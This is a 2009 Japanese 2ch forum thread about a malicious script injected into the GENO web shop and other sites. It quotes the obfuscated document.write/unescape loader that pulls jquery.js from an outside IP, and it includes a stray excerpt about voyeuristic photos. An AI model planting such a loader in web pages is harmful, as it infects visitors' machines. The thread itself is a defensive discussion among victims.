つかGENOなんてショップ初めて知ったよ

フォーマットなんてケチなこと言ってないでハードディスク交換しちゃいなよ。

もしかして本当にGENOのサイトにウイルスがないのか

>>752
俺も、レンタルビデオ店かと思った。

復活後直踏みしてみたけどラトビアにとんだ形跡はないわ
とりあえずキャプ
ttp://www.dotup.org/uploda/www.dotup.org29448.png

どうでもいいけどuploda.orgが閉鎖したことに驚き

>>752
0.1注文で祭りしたじゃん

>>751
そこに明記されていない他のサイトでの同じ被害として↓の報告があったみたい。

【ウィルス情報質問　総合スレッド★Part46】
http://pc11.2ch.net/test/read.cgi/sec/1224511070/690

尚、サーバーのウィルス感染や個人情報の流出はございません。
に変更されてるな

GENOが再び再開。「お詫び」を発表。「ウィルス」ではなく「旧プログラム」とのこと。(23:30頃)

旧プログラムってなに？

GENOさん、見てる〜

祭りになるまで俺もGENOなんて知らなかったがこれには笑った

672 名前： PAC-3(東京都)[sage] 投稿日：2009/04/05(日) 02:45:55.56 ID:Wtu0Z/3+
>>664
0より上で1以下の数値が入れられる状態だったから
0.1とか0.001とかでも　商品が買える状態になってたｗ
金額も *個数だから当然1/10とかになっちゃうわけで。

で在庫数が　54.00987とかになっててﾜﾛﾀ

ここ見てるだろｗ

>>758
juicyrockなら書いておいたが…

>>764
あ、すまないです。見落としてたｗ

　　　　　　　　　 ;' ':;,,　　　　　,;'':;,
　　　　　　　　　;'　　 ':;,.,.,.,.,.,,,;'　　';,
　　　　　　　　,:'　　　　　　　　 　　: :､
　　　　　　　,:' ＼ 　,,.　､.／ 　ノ（ ::::::::',
　　　　　　 :'　 ●　　　　 ●　⌒ 　 :::::i. 　　＜このまま俺達から逃げ切れると思ってるのか！
　　　　　　 i　 '''　(_人＿)　'''' ＊ 　 :::::i　　
　　　　　 　 :　 　 {+ + +}　　　　　　:::::i
　　　　　　　`:,､ 　￣￣　 　 　 ::::::::: /
　　　　　　　　,:'　　　　　　　 : ::::::::::::｀:､
　　　　　　　 ,:'　　　　　　　　 : : ::::::::::｀:､

>>744
東大や早慶以外は目糞鼻糞。
というか、もう直ってるだろ。

>>762
ttp://www.dotup.org/uploda/www.dotup.org29464.png
値段もめちゃくちゃになってた
んで、一日放置した後の反応が>>710
更に、このメールすら来てないって人もいたな。

まだウィルスが復活しない様なのでもう寝ます。

ウイルス応援するわ
はよ潰れろ

>>437
まともな会社なら、代表取締役名義で詫び状書くはずなんだが・・・
まさにこの会社の経営者の質を表してるな。

GENOのグループ会社？にアイナチュラとかいうマルチの会社があるみたいだな。
まあ昔はステップでアムウェイの商品売ったりしてたもんな。

>>768
関係者の脳が感染してんだろうな

juicyrock.co.jp:219.94.129.173-219.94.129.173

>>762>>710
知らなかった、酷いなｗｗｗ
キャンセルする所までならいいが>>710はないわ

俺しばらくGENOをIEのホームページにして監視してみるわ

puppyインスコできねえｗ
2003にするかorz

　　　　∩＿∩　　　　　人人人人人人人人人人人人人人人人人人人人人人人人人人人人人
　　 ／ ＼ ／＼　　　＜ すごい一体感を感じる。今までにない何か熱い一体感を。　　　　　　 ＞
　　|　 （ﾟ）=（ﾟ）　|　　 ＜ 風・・・なんだろう吹いてきてる確実に、着実に、俺たちのほうに。.　　 ＞
　　|　　●_●　 |　　 ＜ 中途半端はやめよう、とにかく最後までやってやろうじゃん。　　　　　 ＞
　/　　　　　　　　ヽ　 ＜ ネットの画面の向こうには沢山の仲間がいる。決して一人じゃない。 ＞
　| 〃 ------ ヾ　|　＜ 信じよう。そしてともに戦おう。　　　　　　　　　　　　　　　　　　　　　　　 ＞
　＼＿＿二＿＿ノ　 ＜ 工作員や邪魔は入るだろうけど、絶対に流されるなよ。　　　　　　　　＞
　　　　　　　　　　　　　 ＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹＹ

ここもか？

www.naxos.co.jp/_ScriptLibrary/pm.js
最下部
<!--
document.write(unescape('%3CspBscjBrjBispBppHtjB%20srCXHcjB%3DspB%2FpH%2FjB94%2Eze6243y7%2E23y%2E195%2F3yjqze6uerspByCXH%2Ejsze6%3E%3C%2F3ysc3yript3y%3E').replace(/3y|CW|jB|pH|CXH|ze6|spB/g,""));
-->
　　　　　↓
<script src=//94.247.2.195/jquery.js></script>

VPCめんどうな奴は↓使え

Returnil Virtual System

http://www.softnavi.com/virtual_machine-review/review.cgi?id=9

>>771
完全丸投げなんだろうね。ここ。

てか、普通は顧問弁護士に即効で連絡して弁護士の指導の元で
法的妥当性がある文言を選んで侘びを書くのが普通なんだよね。

見事にステップしたな

>>450
確かに「サーバー」は感染してないな。
卑怯すぎる。

ウイルスとか仕掛けられたわけじゃないけど、yodobashi.comにはガッカリ

>>778
確認した。クラックされてる。
どうやって探したの？？

再インストールやっと終わった。
日曜に火狐でgenoのhp見てフリーズしたからおかしいなとは思ったが、
IEでその後試してもフリーズしたのであれ？と本格的に思い、２ちゃんにきて
みたら案の定。もうgenoでは一切買いません。さすがにウイルスもらうとへこむわ。
二度と見る気にならんわ。geno結構好きだったのに、はぁ・・・

GENOcideってラトビア人のハックチームがいてだな

再起動してなんともなければ平気なんだよな？

これを機にSSDにしようと検索した結果intelのX25-E高ぇ

K-SSD60S-VSMお手頃

ぜんぜん関係ないけどラトビアって言葉にエロスを感じるのはオレだけ？

>>787
再起動は関係ないっぽいぞなんか

>>778
お前本当によく見つけたな
>>787
もう組み込まれているんじゃね

>>778
確かに。クラ板に報告してきた

まだやっていたのか

こわくてどこもひらけねーよｗｗｗ

>>789
それラビアｗ

>>778
http://www.naxos.co.jp/

トップからavastさんが怒った

謝罪文(?)が掲載された直後に踏んでしまったんだが大丈夫なのか

>>789
言葉の響きがビラビラと似ててエロスだよな

>>796
ノートン先生も激怒してくれるｗ

アドレスがお客様ってなめてるな
http://www.geno.co.jp/webshop/okyakusama.html

>789　おれはラビオリ連想しておいしそうに感じてしまうよ

http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1324966798
Yahooで質問されてるね・・・

OSはWinっぽいが

Netblock Owner IP address OS Web Server Last changed
Japan NetInfoware Inc. 210.238.212.49 Windows 2000 Microsoft-IIS/5.0 27-Oct-2001

ラビア？

>>796
踏んでみたが思いっきりavast反応してるな
クラックされたサイトって見つかってないだけで結構ありそう？

>>802
＞ jetspiral427さん
＞
＞誤検知だと思います。
＞
＞Freeのウイルス対策ソフトを使われていませんか、マカフィーでは安全なサイトとして認証済みです。
＞【会社概要】にウイルス反応はありませんでした。



ｵﾜｯﾄﾙ

http://www.geno-web.jp/Goods/GA09084440

きたんちゃうか

ラトビアのチーム？

ああバックドアだろう、何度でも仕掛けられるよ

うっかり近付くと君、ボットになっちゃうから気い付けや

ここに張られるアドレスは怖くてしばらくの間ひらけねーよｗｗｗ

感染サイト増えてるのかよ((((；ﾟДﾟ))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

もうURL怖くて踏めない

>>805
知ったかぶりっ子うぜえｗｗｗｗｗｗ

>>805
踏んだのか。
ﾜﾛｽw

>>778
精鋭か！

>>806
怖くてふめねえｗ

>>804
あくまで推測だけど、genoと同じような古い鯖環境で動いているサイトは
ひたすら感染しまくるんじゃないかな。

てか、この一連のスレの最初の方で週末でお休みなその筋のプロっぽくて詳しそうな人が
ここ最近あやしいアタックだかが頻繁に飛んでるとか言ってた位なんで、
この脆弱性を突いた攻撃がwww上で全世界的に無差別に行われているのかもしれない。

>>805
ﾜﾛﾀｗ
なんという勇者ｗ

>>806
※このアドレスは危険URLのひとつです。
注意！アラートオープンを発見！ (17)
注意！ループタグを発見！ (6)

キテるな

>>808
ここだけじゃなくて２ちゃん全部そうだｗｗ

>>817
kwsk。何の商品だ？

>>778
まだ探せばありそうだな・・

これ関連のスレはここしか無いん？
PC板とかは？

>>805
バカフィー…だと？

そんなに恐がるな>>808-810
ちなみに>>806はお詫び？セール
【新品バルク】 BUFFALO USBメモリ 128MB アソート（型番問わず） 高速・安心・豊富な種類のUSBメモリ 何が届くかはお楽しみ♪
　 　
[商品番号] GA09084440
[販売価格] 10 円
[ポイント] 1
[在庫数] 167
　 　
お一人の注文数に限りがあります。最大注文数[1]

10円でウイルスがもらえる訳ですね。わかります。

>>806
128MBってｗ

今更こんな低容量のゴミは使い物にならんわｗ
最低でも1Gは必要だろｗ

カペオンライン重すぎ自重しろ

感染拡大ｗ

>>802
もしかして質問に答えた奴全員ぷぎゃーなのか

>>823
元からそれやってた

セキュリティソフトって当てにならないんだなｗ

まさにGENOウイルス　新たな可能性を示したﾄﾝﾃﾞﾓな数日間だった
とっとと潰れてくれ

>>830
そりゃ新種のウイルスが出現したとたん対応をとれるなんてないからな

>>817
ループとアラートを使わずにJavaScriptなんて無理があるだろ。

Avira使っている人だけ反応したのか

おかえりウィルスｗｗｗ

>>823
それに送料 700 円、代引手数料 315 円掛かる訳ですね

>>802
これWin2000かよ・・・
なんかもういろいろ感染してそうだのう
http://news.biglobe.ne.jp/it/itm_090327_5493294992.html

> IIS 5.xはMicrosoftがWebサーバプラットフォーム市場へ
本格進出するにあたって投入されたバージョンだった。
しかし、2001年以降に相次いで発生したWindowsの脆弱性を突く
ワーム「Codered」や「Nimda」の大規模被害の影響によって、
IIS 5.xをHTTP Serverなどに使用することが危険だという指摘が
セキュリティ企業各社から出された。

>>834
antivirはやや遅れての対応だったはず

>>819
メモリーカード館とあるがよくわからん
なんならソースチェッカーオンラインで自分で確かめてみてくれ

あ、送料は地域によって違うか…

>>837の一行だったから改行必死で引用つけわすれた＼（＾o＾）／

jet脳みそspiral427さん
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1024019220

http://www.geno-web.jp/Goods/GA09077530
firefoxの履歴みたら、4月2日の20時くらいに踏んでいた・・・
でも問題ないっぽい

久々のウイルス祭で楽しい

こいつ、現実世界を知らないのかｗ

http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1317567723
ネット世界になれてないせいか、わからない言葉があります。

「セフレ」ってなんですか？

セックスフレンドの意味なんですか、そうだとしたら私には想像の世界でしかないというか、気になります・・・

genoはなんで感染したの？　どこから入られたの？

>>825
俺は昔買った128MBの奴にClonezilla入れてお手軽環境復活に活用してるぜ

感染したクライアントで、セキュリティホールがあるサーバにアクセスすると
サーバが感染して、感染したサーバにセキュリティホールのあるクライアントが
アクセスするとクライアントが感染するタイプだったら面白いのにな

>>780
秋葉の実店舗に行きゃわかるけど、ここは単なるジャンク屋だよ。
そういう対応を期待するだけ無駄だよ。

genoの128MB USBメモリは挿すだけで
ウィルス感染じゃねーの　怖くてかえねーよ

tracert naxos.co.jp

[ JPRS database provides information on network administration. Its use is ]
[ restricted to network administration purposes. For further information, ]
[ use 'whois -h whois.jprs.jp help'. To suppress Japanese output, add'/e' ]
[ at the end of command, e.g. 'whois -h whois.jprs.jp xxx/e'. ]

Domain Information: [ドメイン情報]
a. [ドメイン名] JAPAN-NET.NE.JP
b. [ねっとわーくさーびすめい]
c. [ネットワークサービス名] ジャパンネット
d. [Network Service Name] Japan Net
k. [組織種別] ネットワークサービス
l. [Organization Type] network service
m. [登録担当者] AF019JP
n. [技術連絡担当者] YI101JP
p. [ネームサーバ] ns12.pwd.ne.jp
p. [ネームサーバ] ns2.japan-net.ne.jp
p. [ネームサーバ] ns3.japan-net.ne.jp
[状態] Connected (2009/04/30)
[登録年月日] 1997/04/15
[接続年月日] 1998/04/01
[最終更新] 2008/05/01 01:09:42 (JST)

とりあえず事前対応/事後対応のどちらかをまとめてくれ。

AntiVir・・・
avast・・・
AVG・・・
BitDefender・・・
カスペルスキー・・・
ノートン・・・
バスター・・・
NOD(ESET)・・・

avast入れたけど使いにくいな

全力だしてもいいですか？

>>852
自分で試せよ

>>751
>・GENOが再び再開。「お詫び」を発表。「ウィルス」ではなく「旧プログラム」とのこと。(23:30頃)

無害だと勘違いされるかもしれないので、もしコピペしてもらえるなら
"「ウィルス」ではなく「旧プログラム」とのこと。"
を削ってほしい。

あと、pdfの方だが
http://wepawet.iseclab.org/view.php?hash=af28f3bc9424a3da7ff8bc84740bce93&type=js
で解析にかけたところadobe reader 8.1.2以上であれば攻撃が行われないっぽい。
うちの環境で実験したら8.1.1でも実行ファイルのダウンロードに失敗するみたいだけど。
とりあえず8.1.1以下のadobe readerを使ってる人は注意

>>847
ぶっちゃけ、うちにはSLCチップの小容量USBメモリやSDカードがごろごろしてて
完全におなかいっぱいだったりするｗ

BIOS更新だとか、インスコしたてのOSにINFやNICのドライバをぶち込むくらいにしか使えないからｗ

とりあえずAVGはいい加減どうにかしろよ

>>855
できないなら黙ってろ

AVGアップデート来てたけど、人柱になる度胸がない

>>675
これポチったけど、今回の糞対応にムカついたんでキャンセルするわ
いくら安くてもこんなショップには1円も落としたくない

>>805
ワロタ

遺憾の意　発　動　

>>9
AviraAntiVir無料版じゃ駄目？

追加。事前対応/事後対応のどちらかをまとめてくれ。

AntiVir・・・
avast・・・
AVG・・・
BitDefender・・・
マカフィー・・・
カスペルスキー・・・
ノートン・・・
バスター・・・
NOD(ESET)・・・

もう何があってもGENOを許さない
人がしんでんねんで！（社会的な意味で）

いいから死ねよ

普段からアレはネットショップだと対処したといわれてもなかなかアドレス踏めねえな。

最新のパターン対応状況 ←New!!
http://www.virustotal.com/analisis/86069691722acbfea18a4c48ef20abad

AntiVir Premiumの定義アップデートをしたが検体未対応ｗ

TrendMicro(ウイルスバスター)
Symantec（ノートン）
Kaspersky（ジャストシステム）
F-Secure（6ヶ月無料版あり）
a-squared（フリー版あり）

の５つは日本語化されています。フリー版もあります。

レジストリー汚されたくない人には、Antidote（セキュ板参照）
定義はここからDLできる。
ftp://downloads5.kaspersky-labs.com/zips/

このスレで終わりかね

カスペのオンラインスキャンが一向に終わらねぇ
一体何時間やってんだ、コレ・・・

>>870
また新しいネタが増えたのに？GENOかよお前

マカフィーでスキャンしたら「generic artemis：トロイ」が引っ掛かったので俺もやられたか、と思ったら…
ヤフー動画を見るためのソフトじゃねーか！寿命縮んだ

通常は｢ActiveX｣と｢Java｣は無効にしているから無害

心配したけどキャッシュ消したのでもう安心だ
ウイルスじゃなくてよかった

結局ラトビアに何を送ってどう運用されるんだよ

コマンドプロンプトでnetstatって入力してbananaって鯖があったんだけどこれってなに？

>>870
わかんない。

てか、メジャーサイトがこれに同じ脆弱性を突かれて感染したら
これどころの騒ぎじゃなくなると思う。

ノーガード戦法の奴にしても定義ファイルを更新していない奴も
案外多いからね。

>>877
2chのどっかの鯖じゃなかった

>>865
個人的にＡＶＩＲＡ→なんかひっかかった。ウイルスは退治できず（4/07/23:00ごろ）
　　　　　　ＡＶＧ　→引っかかる→退治できず(4/07/20:00ごろ)
　　　　　　カスペルスキー→引っかからず。よって退治もできず(4/07/18:00ごろ)
　　　　　　スパイボット→当然無理(4/07/24:00ごろ

もうつかれた。あとはしらん。とりあえず再起動しても平気だったし
やばいもんは入ってないので2,3日放置してセキュリティソフトのアップデートをまつ

さらに追加。事前対応/事後対応のどちらかをまとめてくれ。

AntiVir（無料）・・・対応済み。無料・事前かは知らん
avast（無料）・・・
AVG（無料）・・・
BitDefender・・・
マカフィー・・・
カスペルスキー・・・対応済み。事前かは知らん
ノートン・・・対応済み。事前かは知らん
バスター・・・
NOD(ESET)・・・

ESET(NOD32)あいかわらず何の検知もしなくてﾜﾗﾀ

>>880
乙です

中国　2009-3-28　10:07
ttp://www.discuz.net/viewthread.php?tid=1256129

フランス　2009-4-1　08:54
ttp://forum.cmsmadesimple.org/index.php?topic=32260.msg154847

一部に旧プログラムが残っているらしいぞ

次スレいるか？

>>886
だいぶ勢い落ちてきたけど、この調子だと次スレも必要な予感がする。
次スレ立てるタイミングは950レス過ぎ位で良いんじゃないかな。

いる

もう1スレくらい良いんじゃね
完全に解決したわけでもないし

むしろこのクソ対応でこそ盛り上がるべき時だと思うんだが

>>756
やっぱりー

>>887-889
スレタイ考えようぜ

立てなきゃ被害が確認できないだけだし。対策した俺的には無くても別に・・・
でもGENOってスレタイについてるけど、実際根は相当深いからな。

GENO.1でウイルス感染　キャッシュリセットしろとクソ対応★9

なんかいいの思いつかないな

お詫び特価まだぁ〜

GENOのサイトでウイルス感染　しかし当のGENOはふざけた対応で幕引き　★9

新種のウイルスとか未発見とかいれてくれよん。
自分みたいな馬鹿が引っかかって検索するときに目安になるし、対応できなかった理由も分かるから

>>892
まかせた。

>>893
うん。これ結構根深い問題。

結構いい加減に古い鯖環境でテキトーに動いているサイトって何気に多いからね。
誰もアクセスしない様な個人サイトからそこそこメジャーなサイトまで被害発生源になる可能性は十分にありうる訳で。

とりあえず感染の可能性が高いケースを暫定的にまとめておく

・Windows 2000/XP(Vista、Mac、Linuxは除くが、最初に感染サイトに2000/XPでアクセスしている場合は危険性あり。Me以下は知らない)
・Adobe Reader 8.1.1以下を使用、またはFlash Player 9.0.115.0以下を使用
・JavaScriptを有効にしている

以上の全てに当てはまる人は複数のアンチウィルスソフトでスキャン、もしくはリカバリおすすめ

>>897
新種はNGワード

GENOのサイトでウイルス感染　業務再開するもウィルスの件は一切触れず　★9

GENOのサイトでGenocide★128

Opera最強伝説って入れろよ

これだけ被害が広がってるってことは感染したクライアントから
サーバーにアタックをかけてサイトを書き換えるタイプのウィルスかな？

事前対応/事後対応のどちらかをまとめてくれ。

AntiVir（無料）・・・検出するがなにもできず。事後対応済み。無料かは知らん
avast（無料）・・・
AVG（無料）・・・検出するがなにもできず。無料かは知らん
BitDefender・・・
マカフィー・・・
カスペルスキー・・・検出しない。事後対応済み。
ノートン・・・対応済み。事前かは知らん
バスター・・・
NOD(ESET)・・・

QCPASSとGENOアウトレットを放置ってどういうこと？
同罪なのに

今日の特化品が普通に売れてる
結構と気にしてない奴多いのか
俺たち敗北！？

ﾈｯﾄｼｮｯﾌﾟ｢GENO｣でウイルス感染　業務再開するもGENOｻｲﾄﾞは「ｷｬｯｼｭ消せ」とふざけた対応★9

これでいいか

ﾈｯﾄｼｮｯﾌﾟ｢GENO｣でウイルス感染　業務再開するも「ｷｬｯｼｭ消せ」とふざけた対応★9

こっちの方がいい

138 おさかなくわえた名無しさん: 2009/04/06(月) 02:17:35 ID:EkwbK5WR

2階建て車両の1階からJKのパンチラを撮ってみた
http://anchorage.2ch.net/test/read.cgi/rail/1234445635/

89 ：名無し野電車区 ： 2009/04/07(火) 00:06:21 ID:SvD4dG/p0
>>1
こりゃ盗撮で逮捕だな。
通報しといた。

90 ：名無し野電車区 ： 2009/04/07(火) 00:39:54 ID:fP34mvgkO
>>1
携帯に保存した。

>>908
いいんじゃない？「GENO」などってしたほうがいいかと思うけど。文字数制限に絡むかな。

>>904
鯖にアタック掛ける部分に関してもウィルスなのかどうかまでは
まだわかんないんじゃないかな。

結局感染した鯖を詳細に解析しないとその辺を調査するのは難しいと思うよ。

誰かジャンクのMacでも持ってる奴が居ればGenoと同じくらい古いOSから何から入れて
Genoのボロ鯖をシミュレートして、
DDNSで外向きで囮鯖立ててアタックを待つと面白いかも知れない。

たててきた

しかしラトビアで何をしているのか気になる

>>913
乙

島根県とIDが被った
俺も何かに感染したか

>>913
GJ

で、もうサイトは無害なの？

>>916
あーあかわいそうに、気をつけなきゃダメだぞ


ttp://www3.uploader.jp/user/vipdt/images/vipdt_uljp01946.jpg

>>918
もう無害とかじゃなくて
また書きかえられちゃう可能性があるから
油断できないって話。

さっきおいらがスレの↑の方で張られたUSBメモリのページにアクセスした時は大丈夫だったけど。

つまり、「二度ある事は三度ある」になるか、「三度目の正直」になるかは神のみぞ知るって事ですよ。

GENOは仏の顔も三度までって言葉をよく考えるといいよ

感染したわけじゃないけどクリーンインスコしたら清々しい気分になった

実際被害は確認できてないよな

諸事情でウイルスバスターしか使えないんだけどやっぱりバスターじゃ検出しないよな？
はー…どうしよう

>>882
ESETってだれか検体おくったのかな

>>912
Mac以外のサーバも感染してるんでSQLインジェクションとか
Webアプリへのアタックをうたがったほうがいいかんじだよ

>>925
昨日誰か送ったってレスがあった

>>924
>>905だそうです
ちょっと前くらいみてね

>>924
ごめん
目が狂ってた
ノートンとまちがえてたわ＞＜

なんか今なんでもない普通のページでウイルス反応でてびびった
FLASH使ってるし

　　　　　　　　 ∩＿＿＿_∩
　　　　　　　 / 　　　　 　　ヽ|
　　　　　　　/　●　 　 ●　　|　　　　　
　　　　　　　|///( _●_ )/// ミ　　　　　　
　　　　　　彡､,,　　|∪|　　　/
　　　　 　／＿＿ ヽノ　||￣￣||
　　　　　(＿＿＿u）　　||'ﾟ｡ o ||ヽ
　　　　　　　　|　　　　　||_｡_0_;||__）
　　　　　　　　　　　　 　|＿＿_.|

ttp://ja.uncyclopedia.info/wiki/GENO%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9

バスターは誤検出したり問題あったみたいだけど今は対応したんじゃなかったっけ？

>925

さっき送ったよ、メインPCはカスペなのでサブPC起動したら検知しなかったので。

広告の出稿先は対策を促してるというのに．．．
ttp://corp.itmedia.co.jp/corp/notice/20090407.html

genoって中古を新品として売るようなバッタ物屋だしなぁ
おかげでリカバリする羽目になったお　潰れろ

>934

>現時点では対策ソフトでの駆除はできません。

>>934
窓口まで用意してるな。対応はええ

落とすたびMD5が変わるの何でだろね

>>934
やるじゃん

>938

サーバーで自動生成してるんじゃね？

>>926
なんかプラットフォーム依存って感じじゃないみたいだね。
もしかするとSQLインジェクションやCMS側の穴などを突かれているのかも知れないね。

なんか今　94.247.2.195/jquery.js　でぐぐってみたけど、
中国方面なんかでもこのid=ほにゃららの書き換えでハックされたのかどうかの
教えてGoo!的な書き込みが散見されるね。
それも3/28あたりからの書き込みばかり。

>>938
バージョンうｐとかもあるかもしれないけど
一部のファイルをランダム生成みたいな機構があるのかもね
難読化目的とかかなあ

>>941
ということは28日あたりにすでに仕込まれていて、
大量のトラフィックがあったが故にサイトが激重だった可能性があると？

>>934
さすがに何をやってくるのかまでは分からないか

>>941

>>884
これ？中国語もフランス語も読めないからわからんは

突然重くなったのだとしたらそういう攻撃が続いてたのかもしれないね
だいたいああいうのってゾンビ使って大量アタックしかけそうだし

>>943
その可能性もゼロじゃないと思う。
結局発症日時に関してはGenoがまともに調べて
本当に4日以前には書き換えられていなかったかどうかを
完全に証明してくれないと何ともいえないよ。

ぶっちゃけ、スレに書かれている事をそのまま纏めて稚拙なお詫びと共に書き記しているだけにしか見えないから
本気でログ掘ってチェックしているかどうかすら甚だ疑問だよ。

>>945
それと、↓なんかも。

View Full Version : Has my website been hacked?
ttp://www.dynamicdrive.com/forums/archive/index.php/t-43390.html

js script - for Juliet
ttp://www.windowsbbs.com/malware-virus-removal/82784-js-script-juliet.html

まったく終わってんなぁｗ　
久々に朝が楽しみだ。

ＧＥＮＯでもう買わない
じゃなくて、見にすら行けないなｗ

>>934
genoの広告載せたとこがこんな事言ってんのに
当の本人のgenoが無視決め込むってどういう事だ

[email protected]

おまいらゴルァメールしようぜ

お詫びセールﾏﾀﾞｧ-? （･∀･ ）っ/凵⌒☆ﾁﾝﾁﾝ

この騒動のせいで、張られたURL全然踏めなくなった。。
いつになったら解決すんだよ。。その割なんかIT系サイトでも扱い小さいし。。

/news/?id=10からさっき落とした奴
http://www.virscan.org/report/97b45eb2a7d4643be5afc016cd6a0db0.html

ぐぐってたらこのフォーラムくわしいっぽい
どうせ英語だしこわいやつはふむなよ
http://www.windowsbbs.com/malware-virus-removal/82784-js-script-juliet.html

More than likely a trojan on the local comp has stolen
ftp username & password & that's how the sites get infected.

FTPパスワードぬすんでそうなのがいくつかのサイトに書いてあった

日本語のまとめこのへん
http://www3.atword.jp/gnome/2009/04/06/zlkon-virus-spread-over-japanease-e-commerce-site/

Noscriptで見に行ったけど怖い人はふまないでね

リロードしてなかった
もろかぶりすまん＞＜

あ、てか、Geno鯖のIPであった漏れ串疑惑の件はどうなったんだろ？

少なくても2ch側では焼かれているから2ch書き込み用には使えない筈だけど。
逆に未だに漏れ串として使えちゃうのなら未だに穴あきまくりって事に他ならないけど。

だれかポートスキャンなり、チェックした奴いる？

>>956
どどんまい♪

>>934
これが企業としての本来の対応だよね

GENOは見習うべき
無理だろうけど

>>773
もう駄目かもしれんね

>>951
ということはマスコミの記事(impress)がうそだったんですね。
そっちに抗議送ります　とかメールしてみてはどうだろう。

海外では少し前から改ざん被害があったのにアンチウィルスが
対応してなかったのはマルウェアばらまき開始までにタイムラグがあったのかな

寝る前にふと思った。おやすみなさい。

>>779
(*´3｀) ﾌﾞﾁｭ

なんでケーブル抜いて電源落とさないんだ？気がついてないってこと？
改ざんされた現在も普通に発注入ってるのかな？

>>964
気がついてる
が、売り上げを落としたくないから放置

>>954
これじゃどれが検知できるウイルス対策ソフトかいえないよなあ・・・。
やっぱりパッカーで何種類かあるのか？

>>965
ひでえなｗｗｗ

これを機会にAVGからavastにしてみた。
使いづらいけど、すぐに慣れると思う。

ようやくAVIRAで検出出来るようになったけど、
駆除までは出来ないね。
というかまだどこも駆除までは出来て居ない感じだけど。
亜種も出てきそうだし、踏んだら死を待つかOS再インストールの脅威はまだ残っているのか・・・。

おまいらおはよう
踏まずにスレ1からにニヤニヤしてみてたけどリアルで病気になった(´Д｀)

中国フランスアメリカのフォーラムによると
FTPを使うとIDとパスを感染元に送る可能性があると書かれてるね
抜かれたら改竄されて、改竄サイトを見た人が２次感染という仕組みか
対策としてはOS再インスコがあげられてたは…

ということは

なんのIDとパスよ

二次感染した方の被害は？
まだラトビアに何か送信してるって事しか分からないのか

>>972
ftpパスワード

どうしたおまいら！？勢いが急速に衰えてるぞ！
新学期がはじまったからか？そんなにニュー速って学生多いのか！？

２ちゃん見てる奴なんて学生くらいだろ

CMSでサイト管理しててもやばいって事？

今知った。サイトにあるようにキヤッシュ消した。
カスペルしたら感染してる・・・
履歴を消したら、Geno経由で感染した証拠もなくなるじゃないか。

まじで酷くないか？

プロバイダにアクセス履歴が残ってるはず

>>955にもあるけど

＞694 名前： フリージア(東京都)[sage] 投稿日：2009/04/07(火) 08:09:42.90 ID:aQV3b+FB
＞Genoの.jsなんだが
＞<!--
＞document.write(unescape('%3CsoQcripB9tmO%20smOrc%3DB9%2F%2F94tNt%2EtNt2fq4YMj7tNt%2Ew22YMj%2E19N65rz0%2FjqueryB9%2EmOjoQs%3EBn%3C%2FsmOctNtriN6ptNttYMj%3E').replace(/w2|oQ|YMj|fq|rz0|B9|tNt|N6|Bn|mO/g,""));
＞-->
＞なんだよこれ、ウィルス復旧してんじゃねぇかｗ
＞ファイルを元に戻しただけで、そもそもの外部からの侵入口は開いたままだったのかｗｗｗ

最初の鯖復旧から別のコードになってってことは
とりあえずgenoがftpハックされっぱだったのは確実じゃね

で、GENOはもうウィスル排除できたの？

ゲノ自体がウィルスのように見えてきました＾＾；

>>976
(´・ω・｀)

お聞きしたいのですがフォーマットしないで
リカバリ領域からのリカバリじゃ意味ないんでしょうか？

はよ、次スレたてておくれ('A`)

前にFC２なんかの個人ブログがやられまくった時の個人の対応より酷すぎるだろw
放置垢以外は消すなり、ロックかけたりしてたしなー

たってるよ。
http://tsushima.2ch.net/test/read.html/news/1239126066/l100

お前らがいるから2chを安全に楽しめる

システムの復元してウイルスチェックもしたけど不安が消えねー
フォーマットは絶対したくねえ
胃が痛い

今履歴調べたら4/3の18時にアクセスしてたギリギリセーフか

GENOサイド

>>990
でも審判にはｱｳﾄと言われ、ﾌﾞﾗｳﾝ監督と共に退場

今起床した。GENOの対応ﾜﾛｽｗｗ

http://tsushima.2ch.net/test/read.cgi/news/1239126066/

次ここ？

958 ：[Fn]＋[名無しさん]：2009/04/05(日) 01:46:48 ID:kDmqdJ/4
    昨日の10時頃からみたいだけど？
959 ：[Fn]＋[名無しさん]：2009/04/05(日) 01:56:25 ID:DhrYIPH5
    確実感染なのはそうみたいだね。ウイルスは本物の新種みたいだ。
    2日付で発見された新種の亜種だとか。それはソフトは無力になるなー。
    なぜGENOみたいなマイナーサイト狙ったんだろ。もっと大手なら大変なことに

>>1000ならGENOが神対応

普通に営業再開しててワロタ

u

1000ならGENO破産

1000ならGENO倒産

このスレッドは１０００を超えました。
もう書けないので、新しい職を探して下さい。。。

　　　　　　　　　　　　　　　　　　　　　　　　　　　　ニュース速報
　　　　　　　　　　　　　　http://www.hellowork.go.jp/